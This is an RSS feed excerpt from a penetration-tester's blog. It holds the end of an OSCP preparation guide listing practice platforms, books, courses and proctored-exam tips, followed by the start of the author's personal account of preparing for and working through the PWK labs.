&lt;p&gt;SANS Holiday Hack Challenges: 
&lt;a href=&quot;https://www.holidayhackchallenge.com/past-challenges/&quot;&gt;https://www.holidayhackchallenge.com/past-challenges/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;capture-the-flag-competitions-ctfscyber-competitions&quot;&gt;Capture the Flag Competitions (CTFs)/Cyber Competitions:&lt;/h1&gt;
&lt;p&gt;I know some of you reading this are probably skeptical about why I added this…well, to be honest, the cybersecurity careers we are in are not a normal 7am-3pm job…it is a lifestyle. I understand that for many of us it is hard to set aside time to do all of the things in this field, and that is totally OK! If you have the time, or once you can, set some time out of your busy schedule to do a CTF. Go ahead and hack all of the things that many of these CTFs provide as challenges. Trust me, you will learn some cool things in a CTF that not even a class may be able to teach you. Personally, competing in CTFs did help me in this course, and it also gave me a better understanding of what I should be looking for instead of jumping into rabbit holes!&lt;/p&gt;

&lt;p&gt;Also, do not be scared to compete in a CTF if it is your first time! Everyone has to start somewhere in their journey; you just have to keep pushing forward. So go out there and find some CTFs, whether they are local to you or online, make some time, and have confidence in doing them.&lt;/p&gt;

&lt;p&gt;If you cannot find any local CTFs check out &lt;a href=&quot;https://www.CTFTime.org&quot;&gt;CTFTime&lt;/a&gt; for online competitions that you can participate in. 
A lot of the cyber competitions in the past few years really helped me build my skills, and I still go out once in a while to find a CTF to compete in for fun 😊.&lt;/p&gt;

&lt;h1 id=&quot;bug-bounty-programs&quot;&gt;Bug Bounty Programs:&lt;/h1&gt;
&lt;p&gt;A great place to practice your skills and possibly make some profit as well! There are many bug bounty programs, like Bugcrowd and Hackerone, that you can participate in for free. If you have never participated in a bug bounty before, check out Bugcrowd University, as they provide a vast amount of material and resources to help you get started: 
&lt;a href=&quot;https://www.bugcrowd.com/university/&quot;&gt;https://www.bugcrowd.com/university/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;vulnerable-machines&quot;&gt;Vulnerable Machines:&lt;/h1&gt;
&lt;p&gt;Boot-to-Root Vulnerable Machines! These machines are excellent for helping you build your pentesting skills. There are places where you can download them and run them on your own system to practice, and places where you can connect to their range and start hacking the targets they host. Most of them end with obtaining root or Administrator/SYSTEM level access. Personally, my two favorite places are Hackthebox and Vulnhub.&lt;/p&gt;

&lt;h3 id=&quot;hackthebox&quot;&gt;&lt;a href=&quot;https://www.hackthebox.eu/&quot;&gt;Hackthebox&lt;/a&gt;:&lt;/h3&gt;
&lt;p&gt;An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. If you have not gone through the registration yet, you will need to pass a challenge to generate yourself an activation code. Once you have generated your activation code, you will have access to their range. In the free tier you are allowed to play with the 20 active machines they have; they cycle a new system into the range every week and retire an old one as well.
If you want access to their retired machines you will have to get VIP access. It is very affordable in my opinion, and worth investing in. If you do not have the funds to invest in Hackthebox, do not worry, because you can certainly find walkthroughs online (once the boxes are retired). One place I would definitely recommend looking at is IppSec’s Hackthebox walkthroughs on YouTube! I love watching his videos because he goes step by step through how to obtain access to the target and how to escalate your privileges to obtain root access. Each box has a different scenario, and IppSec always has something extra to throw in when he is doing his walkthroughs.&lt;/p&gt;

&lt;p&gt;With that being said, I created a list of all of the boxes I did on Hackthebox that I thought were OSCP-like. You can find them here, and also check out the IppSec playlist he created from the list I recommended to start watching!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PWK/hackthebox.png&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I will continue to update this list in the future, and if you would like to keep it around you can find it here and on NetSecFocus: &lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;HTB Boxes to Prepare for OSCP (Youtube Playlist): &lt;a href=&quot;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&quot;&gt;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I want to give a huge thanks to ch4p and g0blin for starting Hackthebox! I am glad that I got to talk to you guys and I am grateful that we were able to help you guys out. I look forward to seeing you guys grow and will soon submit a box for you guys in the future!&lt;/p&gt;

&lt;h3 id=&quot;vulnhub&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/&quot;&gt;Vulnhub&lt;/a&gt;:&lt;/h3&gt;
&lt;p&gt;Just like Hackthebox, except you have to download the vulnerable machines and run them on your local system. You will need VMware or VirtualBox (I recommend VMware Workstation) to run these vulnerable systems. Please make sure that you are running these vulnerable systems on an isolated network and not on a public network.&lt;br /&gt;
Thanks to g0tmi1k and his team for hosting this site, and to the creators who submit these vulnerable machines. I have also created a list of Vulnhub machines that I have found to be OSCP-like. You can find them here and on NetSecFocus:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PWK/vulnhub.png&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I will continue to update this list and if you would like a copy for review you can certainly find it here: 
&lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Rooting vulnerable machines is extremely important when you are preparing for PWK/OSCP because you can’t depend on theoretical knowledge to pass. Improving your hands-on skills will play a key role when you are tackling these machines.&lt;/p&gt;

&lt;h1 id=&quot;tips-to-participate-in-the-proctored-oscp-exam&quot;&gt;Tips to participate in the Proctored OSCP exam:&lt;/h1&gt;

&lt;p&gt;As of August 15th, 2018, all OSCP exams are proctored. This means that a student will be monitored by an Offensive Security staff member through a screen sharing and webcam service. If you would like to learn more about this new proctoring process you can find it here: &lt;a href=&quot;https://www.offensive-security.com/offsec/proctoring/&quot;&gt;https://www.offensive-security.com/offsec/proctoring/&lt;/a&gt;.
Before I took my exam, I had to go through a variety of things to make sure I was prepared for my first attempt. Even with my preparation, I lost 30 mins of my actual exam time troubleshooting the proctoring applications on my end. With that being said, here are my tips to help you prepare for the proctoring part when you are ready to take the exam:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Make sure your system is able to meet the software/hardware requirements that Offensive Security provides in order to run these services. You can find that information here: &lt;a href=&quot;https://support.offensive-security.com/proctoring-faq/&quot;&gt;https://support.offensive-security.com/proctoring-faq/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Test your webcam to make sure it works. If you do not have a webcam on your system, you can also use a spare laptop that has a webcam and run the webcam session on that system.&lt;/li&gt;
  &lt;li&gt;The ScreenConnect application needs to be running on the main system that you will be using to connect to your exam.&lt;/li&gt;
  &lt;li&gt;You can use multiple monitors for the exam. Keep in mind that the proctor must be able to see them and that they are connected to your system. The proctor will tell you how many screens they see, and you will need to confirm that against the number of monitors you are using. If you use a system that has a monitor that is not connected to the ScreenConnect application, then you will not be able to use that monitor for the exam.&lt;/li&gt;
  &lt;li&gt;Be prepared, and log into your webcam and ScreenConnect sessions 30 mins before your exam.&lt;/li&gt;
  &lt;li&gt;Proctors cannot provide any assistance during the exam.&lt;/li&gt;
  &lt;li&gt;You can take breaks, a nap, or grab a cup of coffee during your exam. Just make sure you notify the proctor when you leave and when you return to your exam.&lt;/li&gt;
  &lt;li&gt;Also, be dressed for your exam. I think it is pretty simple to understand why.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For any other questions you may have, you can check out Offensive Security’s FAQ for proctored exams here: &lt;a href=&quot;https://www.offensive-security.com/faq/&quot;&gt;https://www.offensive-security.com/faq/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;other-resources&quot;&gt;Other Resources:&lt;/h1&gt;
&lt;p&gt;NetSecFocus Learning Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738&quot;&gt;https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;books&quot;&gt;Books:&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;Kali Linux Revealed: &lt;a href=&quot;https://www.kali.org/download-kali-linux-revealed-book/&quot;&gt;https://www.kali.org/download-kali-linux-revealed-book/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Attacking Network Protocols: &lt;a href=&quot;https://nostarch.com/networkprotocols&quot;&gt;https://nostarch.com/networkprotocols&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Red Team Field Manual: &lt;a href=&quot;https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504&quot;&gt;https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Hash Crack: Password Cracking Manual v3: &lt;a href=&quot;https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618&quot;&gt;https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The Hacker Playbook Series: &lt;a href=&quot;https://securepla.net/hacker-playbook/&quot;&gt;https://securepla.net/hacker-playbook/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The Web Application Hacker Handbook: &lt;a href=&quot;http://mdsec.net/wahh/&quot;&gt;http://mdsec.net/wahh/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Violent Python: &lt;a href=&quot;https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579&quot;&gt;https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Black Hat Python: &lt;a href=&quot;https://nostarch.com/blackhatpython&quot;&gt;https://nostarch.com/blackhatpython&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;courses-that-can-help-you-prepare-for-oscp&quot;&gt;Courses that can help you prepare for OSCP:&lt;/h4&gt;

&lt;p&gt;eLearnSecurity:
eLearnSecurity offers affordable security training and a large number of labs that you can practice in on their Hera lab network. They have their own certifications as well that you can take. These are the courses that I took to help me prepare for OSCP.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Penetration Testing Student (PTS): &lt;a href=&quot;https://www.elearnsecurity.com/course/penetration_testing_student/&quot;&gt;https://www.elearnsecurity.com/course/penetration_testing_student/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Penetration Testing Professional (PTP): &lt;a href=&quot;https://www.elearnsecurity.com/course/penetration_testing/&quot;&gt;https://www.elearnsecurity.com/course/penetration_testing/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Web Application Penetration Testing (WAPT): &lt;a href=&quot;https://www.elearnsecurity.com/course/web_application_penetration_testing/&quot;&gt;https://www.elearnsecurity.com/course/web_application_penetration_testing/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;SANS:
SANS provides a wide variety of information security courses. Each of their courses is taught by very smart instructors who have been in this field for a very long time. However, these courses can be expensive if you are unable to get someone to pay for them. You can also try to apply for the SANS workforce training to be able to take their courses at a discount. I have taken most of the SANS courses, and I feel that the following courses really helped me get a better understanding of what pentesting is like in the actual field. Here are the courses that I would recommend if you are looking to prepare for OSCP.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;SANS 560: &lt;a href=&quot;https://www.sans.org/course/network-penetration-testing-ethical-hacking&quot;&gt;https://www.sans.org/course/network-penetration-testing-ethical-hacking&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SANS 542: &lt;a href=&quot;https://www.sans.org/course/web-app-penetration-testing-ethical-hacking&quot;&gt;https://www.sans.org/course/web-app-penetration-testing-ethical-hacking&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;PentesterLab:
A lot of web app pentesting material in this course:
&lt;a href=&quot;https://pentesterlab.com/&quot;&gt;https://pentesterlab.com/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pentester Academy: 
&lt;a href=&quot;https://www.pentesteracademy.com/topics&quot;&gt;https://www.pentesteracademy.com/topics&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;other-oscp-guides&quot;&gt;Other OSCP guides:&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html&quot;&gt;https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://411hall.github.io/OSCP-Preparation&quot;&gt;https://411hall.github.io/OSCP-Preparation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.gitbook.com/book/sushant747/total-oscp-guide&quot;&gt;https://www.gitbook.com/book/sushant747/total-oscp-guide&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://0xc0ffee.io/blog/OSCP-Goldmine&quot;&gt;http://0xc0ffee.io/blog/OSCP-Goldmine&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/&quot;&gt;https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/&quot;&gt;https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Links:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://practicalpentestlabs.com/&quot;&gt;https://practicalpentestlabs.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://immersivelabs.co.uk/&quot;&gt;https://immersivelabs.co.uk/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&quot;&gt;http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://maikthulhu.github.io/2017-11-20-onenote-layout/&quot;&gt;https://maikthulhu.github.io/2017-11-20-onenote-layout&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;conclusion&quot;&gt;Conclusion:&lt;/h1&gt;
&lt;p&gt;Welcome! You have arrived at the end of this journey (well, not your OSCP journey, if you decide to pursue it!). If you read this entire guide, I certainly give you props for doing so. If you read only parts of it, then I still give you props, because the main thing that is important to me is that you learned something from it! I hope you are able to use my guide in your OSCP journey and learn some new things, just like I did when I started mine. If this guide was able to help you, let me know; I want your feedback for sure. I thanked a lot of people for helping me with my journey in this guide, and I want to thank them again for their time and contributions in helping me learn and grow in the cyber-security field.
If anyone has any questions or feedback about this guide, please let me know; you can reach out to me on Twitter or on NetSecFocus!&lt;/p&gt;

&lt;p&gt;-TJNull
Twitter: &lt;a href=&quot;https://twitter.com/TJ_Null&quot;&gt;https://twitter.com/TJ_Null&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Github: &lt;a href=&quot;https://github.com/tjnull&quot;&gt;https://github.com/tjnull&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Netsec Focus: Tjnull&lt;/p&gt;

&lt;p&gt;Hackthebox Discord AMA: &lt;a href=&quot;https://www.youtube.com/watch?v=41DIav25Mp4&quot;&gt;https://www.youtube.com/watch?v=41DIav25Mp4&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bugcrowd: &lt;a href=&quot;https://www.bugcrowd.com/researcher-spotlight-ambassador-tony-aka-tj-null/&quot;&gt;https://www.bugcrowd.com/researcher-spotlight-ambassador-tony-aka-tj-null/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;P.S: Considering this journey as an extra mile, I am going to have to insist at this point for you to…… Try Harder! -Offensive Security&lt;/p&gt;

</description>
            <pubDate>Fri, 29 Mar 2019 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>An Adventure to Try Harder: Tjnull&apos;s OSCP Journey</title>
            <link>/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html</link>
            <guid isPermaLink="true">/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html</guid>
            <description>&lt;h3 id=&quot;dedication&quot;&gt;Dedication:&lt;/h3&gt;
&lt;p&gt;Before I start discussing my journey, there are a few people to whom I want to dedicate this blog post.&lt;/p&gt;

&lt;p&gt;First, I want to dedicate this post to my parents and my sisters. Thank you for giving me the time to focus on this and to prepare for this journey. I know that during my journey I did not get to spend much time with you, since I was pretty much on the computer every single day just prepping for this. I cannot thank you enough for supporting me and for continuing to push me to follow my dream. I will always be here for you.&lt;/p&gt;

&lt;p&gt;Lastly, I want to thank the InfoSec community. A lot of you reached out to me in so many ways to check up on me and to support me through this journey. I know there were times when I even ranted to you about my journey and you were there to comfort me. I could list every single person that has reached out to me during this journey and this post would just be endless! Thank you for inspiring and also motivating me to learn more. I hope that I can always help someone in this field to learn something and be able to provide support when they are in need.&lt;/p&gt;

&lt;p&gt;You know who you are, and you should give yourself a pat on the back :D!&lt;/p&gt;

&lt;p&gt;We live in a crazy time and the InfoSec world is only going to continue to grow at a rapid pace.&lt;/p&gt;

&lt;p&gt;Now here is what you all have been waiting for…&lt;/p&gt;

&lt;h3 id=&quot;motivation-to-take-oscp&quot;&gt;Motivation to take OSCP:&lt;/h3&gt;

&lt;p&gt;When I was a senior in high school, my instructor for my Security+ course gave me my first hacking CD (BackTrack 5 R3) and a BackTrack cookbook. Throughout the class we would go through a chapter of the book each week and do hands-on labs/exercises to identify security issues or vulnerabilities. I fell in love with it, and I knew becoming a hacker or a pentester was going to be the career for me. In high school I had my A+, Net+, and my CCNA, but I was always curious about what pentesting certifications were out there, which led me to OSCP. After looking at the syllabus I knew I was not ready, but I was determined to get this certification on the first try by preparing for it.&lt;/p&gt;

&lt;h3 id=&quot;previous-experience&quot;&gt;Previous Experience:&lt;/h3&gt;

&lt;p&gt;I’ve been in the IT/Cyber Security field since 2012 (if you count education experience). I started working as a depot repair technician fixing broken laptops, and I hated it. After working there, I was offered an opportunity to be a cyber lab technician at the community college I graduated from. That place is where I learned so much more about cyber security, because my co-worker and I had to spin up the entire program from the ground up… It was awesome! My coordinator would assign me so many tasks, which gave me the ability to learn more and hone my skills. After two years I took another position working for a government contractor as a SOC analyst, because the college was unable to hire me full time. I never left the college, though, because I was offered a position as an adjunct professor teaching the Ethical Hacking class they offered.&lt;/p&gt;

&lt;p&gt;One thing that I enjoyed in high school and throughout college was competing in cyber competitions like CyberPatriot and National Cyber League. These competitions really helped me get more engaged in cyber security, and I still enjoy competing today. In the past 5 years I have competed in 205 competitions including MACCDC, ALCCDC, Global Cyberlympics, and my favorite one of all, SANS NetWars. I won my first time competing at SANS NetWars and was given the opportunity to compete in the SANS Tournament of Champions, and it was incredible.
With my work experience, trainings, and personal hobbies I was able to obtain a lot of exposure to the field and improve my skill set, which helped me through my journey.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Operating Systems: Windows, Linux&lt;/li&gt;
  &lt;li&gt;Windows Server Administration&lt;/li&gt;
  &lt;li&gt;Virtualization: VMware, Citrix, Proxmox&lt;/li&gt;
  &lt;li&gt;Networking (Cisco routers and switches, DHCP, DNS, Wireshark, and configuring firewalls)&lt;/li&gt;
  &lt;li&gt;Programming: Python, Bash, Ruby&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;trainings-i-took-before-i-attempted-oscp&quot;&gt;Trainings I took before I attempted OSCP:&lt;/h3&gt;

&lt;p&gt;2012-2015:
CompTIA A+ training.
CompTIA Net+ and CCNA Routing and Switching.
Security+ training.
Microsoft MCSA training.&lt;/p&gt;

&lt;p&gt;2016-2017:
Cisco CCNA Cyber Ops training.&lt;/p&gt;

&lt;p&gt;2017-2018:
SANS 504: Hacker Tools, Techniques, Exploits, and Incident Handling
SANS 560: Network Penetration Testing and Ethical Hacking
SANS 542: Web App Penetration Testing and Ethical Hacking
SANS 573: Automating Information Security with Python
SANS 564: Red Team Operations and Threat Emulation
DerbyCon 2018 Training: Windows Attack and Defense
eLearnSecurity: Penetration Testing Professional v5&lt;/p&gt;

&lt;p&gt;(I have to thank my current employer for the SANS courses, because they are very supportive of my education and of helping me continue to learn more about this field.)&lt;/p&gt;

&lt;h3 id=&quot;pre-requisites-for-pwk&quot;&gt;Pre-Requisites for PWK:&lt;/h3&gt;

&lt;p&gt;From my perspective, I was nervous at first reading the prerequisites for taking the OSCP course, but I will say this: don’t let them throw you off. Even where it states “Familiarity of Bash scripting with basic Python or Perl a plus”, that will definitely help you, but it is not really a requirement. I am not saying you shouldn’t learn Python, Perl, or Ruby. What I am trying to say is that as long as you have an understanding of the programming language and you can understand the scripts, then you will be fine.&lt;/p&gt;

&lt;p&gt;As practice, for fun, I would take exploits online (Metasploit modules for sure!) and write them in another programming language. For instance, take an exploit that is written in Python and rewrite it in Ruby. There are many ways you can learn more about programming online! You just have to find which material or resources will work for you. Personally, being hands on writing scripts was the best way I got to learn more about Python, Ruby, and Bash. In the SANS 573 class, Mark Baggett created all of the lab assignments using pyWars to make us write the proper scripts to solve the Python challenges he created.&lt;/p&gt;

&lt;p&gt;Here are some resources that I used to help me prepare for the PWK labs and the OSCP Exam.&lt;/p&gt;

&lt;h3 id=&quot;abatchys-noob-friendly-guide-to-prepare-for-oscp&quot;&gt;Abatchy’s noob friendly guide to prepare for OSCP:&lt;/h3&gt;

&lt;p&gt;&lt;a href=&quot;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&quot;&gt;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A good list of open-source resources you can use to prepare for PWK/OSCP. Abatchy is also a good friend of mine, and my next post will be a guide like his but updated with more resources. Take the time to go through this material, as the structure of his guide is based on the syllabus for the OSCP.&lt;/p&gt;

&lt;h3 id=&quot;vulnhub&quot;&gt;Vulnhub:&lt;/h3&gt;
&lt;p&gt;The only way to prepare yourself is to get your hands dirty. Vulnhub contains a large collection of vulnerable machines that you can go through to test your skills. I posted a list on Twitter a few days ago that contains the OSCP-like boxes I used to prepare for the class.&lt;/p&gt;

&lt;p&gt;Link to the OSCP-Like Vulnhub boxes: &lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;hackthebox&quot;&gt;Hackthebox:&lt;/h3&gt;

&lt;p&gt;Hackthebox is a fantastic online platform that allows members to test their penetration testing skills. There are so many challenges and machines that get released on a weekly basis. The best part is that it is free to the community! You need to pass the first challenge to obtain an invite code in order to play with their challenges. If you get VIP access you will be able to go through a large number of the retired boxes as well.&lt;/p&gt;

&lt;p&gt;If you cannot afford VIP access, do not worry, because IppSec has a fantastic YouTube channel where he does full-on walkthroughs showing you how to obtain user and root access on the system. Each week he usually tries to add some new content for each box, and it really helped me when I was in the PWK labs.&lt;/p&gt;

&lt;p&gt;As of January 29, 2019, here is a list of HacktheBox machines that are OSCP-like: &lt;a href=&quot;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&quot;&gt;https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159&lt;/a&gt;
Link to IppSec’s YouTube playlist: &lt;a href=&quot;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&quot;&gt;https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If there is one thing that you should focus on while preparing to start PWK, it is making sure you have enough time to invest in the labs. Seriously, I managed my time in the labs and would spend at least 4-5 hours on a weekday in the lab and over 5 hours on the weekend for sure. Make sure you talk to your family, girlfriend, boyfriend, friends, or anyone else to let them know what you are going to be doing for the next 30, 60, or 90 days! Trust me, I had to remind my father a few times about what I was doing as he would yell at me to get off of the computer XD. The total amount of time I dedicated to the lab and the exam was exactly 212 hours. As long as you can dedicate 5 hours per day or 20 hours per week to study, you should do fine in the labs.&lt;/p&gt;

&lt;h3 id=&quot;the-90-day-journey-for-mepwk-course-time&quot;&gt;The 90-day journey for me…PWK-Course Time!&lt;/h3&gt;

&lt;p&gt;So, you registered for the course. Great! You should have received the links to your lab material, which contains the following:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;380-page PDF manual going through the course material&lt;/li&gt;
  &lt;li&gt;A set of videos to go along with the course material&lt;/li&gt;
  &lt;li&gt;VPN connection pack to access the PWK lab environment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For the first few days, I will admit, the PDF can be dry with the content provided, but if you watch the videos along with it, it can be very enjoyable. The exercises were super fun as well, and when you do them, document them too. When I finished the videos and manual, I went through some of the sections that I felt weak on to hone my skills. For instance, I went through the buffer overflow section many times just to understand the process. If you are just starting out, then you will certainly enjoy the exercises as much as I did, because they are direct walkthroughs of how to complete each exercise step by step. Seriously, I have to give my props to Offsec because they definitely put in the time and energy to make the material easy and clear to understand. If you get stuck or are having issues with your exercises, remember to check the Offsec forum, because there is a chance that other students could be having the same issues as well.&lt;/p&gt;

&lt;p&gt;As an extra bonus, Offsec allows you to get extra points if you document your walkthroughs of exploiting 10 systems and all of the exercises. The max score you can get for doing this is 5 points, depending on how well you documented your exercises and 10 lab boxes.&lt;br /&gt;
I did the documentation to obtain the extra 5 points since they could come in handy, but it is also a great way to improve your documentation skills. This is extremely important because you will have to write a report at the end of your OSCP exam as well. The lab report took me a total of 25 hours (over 5 days) to document.&lt;/p&gt;

&lt;h3 id=&quot;pwk-lab-network&quot;&gt;PWK Lab Network:&lt;/h3&gt;

&lt;p&gt;Now comes the lab network! This part of the course is the best part in my opinion, and I got extremely addicted to it. Over 50 lab machines in 3 separate networks (Public, IT, Dev, and Admin) that you get to hack… let the fun begin! I spent a total of 127 hours in the PWK lab network and I was able to pwn the entire lab network in 28 days. The labs are super addicting for sure, because each box has its own difficulty, ranging from extremely easy to the point where you can get extremely frustrated. I remember owning 17 boxes in 14 hours one day and then getting stuck on a system in the admin network for 3 days straight.&lt;/p&gt;

&lt;p&gt;Each machine will test not only your understanding of the lessons taught in the course content but your research ability as well. This is where you get to build your own methodology for attacking these machines, and remember that everyone has their own methodology. In addition, your Google-fu will help you tremendously here to identify new techniques and tools, understand services, and learn more about the operating systems themselves. After you own a machine, make sure you document everything you did to obtain a shell, and also how you escalated privileges to obtain a full shell. You will realize that there is not just one way to own a machine, as each machine in PWK can have multiple attack vectors.&lt;/p&gt;

&lt;p&gt;Things to keep in mind when you are attempting the lab network:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Enumerate, Enumerate, Enumerate! (Port scan (UDP scan as well!), version scan, OS scan, web scan, research, etc.)&lt;/li&gt;
  &lt;li&gt;Understand the purpose of the system (What does it do? Who uses it? Why was it created?)&lt;/li&gt;
  &lt;li&gt;Documenting your steps will help you for sure, as you can review them and they may come in handy for another machine you are working on. I used OneNote for Windows 10 for my documentation and it was fantastic to use. My notes were also synced to the cloud, so I did not have to worry about losing them, and I had the ability to review them from multiple devices if needed.
If you would like to use the OneNote template that I used for the labs and the exam, you can find it here (all credit goes to maik for making this): &lt;a href=&quot;https://maikthulhu.github.io/2017-11-20-onenote-layout/&quot;&gt;https://maikthulhu.github.io/2017-11-20-onenote-layout/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Track the hours you spend so you can see your improvement; it will help you understand whether you are using your time wisely in the lab.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;oscp-exam-prep&quot;&gt;OSCP Exam Prep:&lt;/h3&gt;

&lt;p&gt;Sorry, I will not be giving away any spoilers about the exam, but I will share my advice on how I prepared for it 😊. After pwning all of the machines in the lab I had two weeks to prepare for my exam! Keep in mind that the exam slots do fill up fast, so make sure that you schedule your OSCP exam at least one month in advance. If you are unable to commit to that time, do not worry at all, because you can always reschedule it for a later date to better prepare yourself for it.&lt;/p&gt;

&lt;p&gt;One blog that I have to give credit to for helping me prep for the exam mentally is this one:
&lt;a href=&quot;https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/&quot;&gt;https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/&lt;/a&gt;
